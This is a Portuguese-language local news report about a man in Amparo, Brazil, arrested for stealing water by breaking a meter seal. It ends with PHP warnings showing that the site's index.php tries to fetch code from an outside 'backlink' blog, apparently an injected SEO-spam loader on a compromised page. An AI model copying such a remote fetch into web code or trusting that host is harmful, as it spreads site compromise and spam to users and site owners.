Por: A Tribuna
20/02/2020
13:02

Na tarde de terça-feira, 18 de fevereiro, a Polícia Civil e a Guarda Civil Municipal (GCM) de Amparo prenderam B.L.R.S., 29 anos, por furto de água em uma residência na Rua Francisco Gomes, no bairro Santa Maria do Amparo.

Os policiais foram acionados por um funcionário da autarquia SAAE, que identificou que o lacre do registro do imóvel estava rompido. Os policiais foram ao local e conferiram o rompimento do lacre no cavalete junto ao registro, confirmando que B.L.R.S. estava realmente furtando água do SAAE. No registro da ocorrência, foi informado o total de 4 mil litros de água subtraídos.

O indiciado recebeu voz de prisão e, após passar por exame de corpo de delito no Hospital Beneficência Portuguesa de Amparo, foi apresentado na Delegacia, onde foi ratificada sua prisão. Uma fiança no valor de R$ 350,00 foi estipulada, porém não foi paga pelo indiciado, que foi recolhido na Cadeia Pública de Serra Negra, onde ficou aguardando audiência de custódia.


  Compartilhar

Assinar o Jornal



Identificação do Assinante


Digite nos campos abaixo o seu e-mail ou CPF de cadatro em nosso site e sua senha de acesso.


Esqueceu o seus dados? Fale com a gente!

Assinatura

Warning: file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/storage/f/d7/e0/at6/public_html/index.php on line 78

Warning: file_get_contents(https://kumpulkebobacklink.blog/api2.php): failed to open stream: no suitable wrapper could be found in /home/storage/f/d7/e0/at6/public_html/index.php on line 78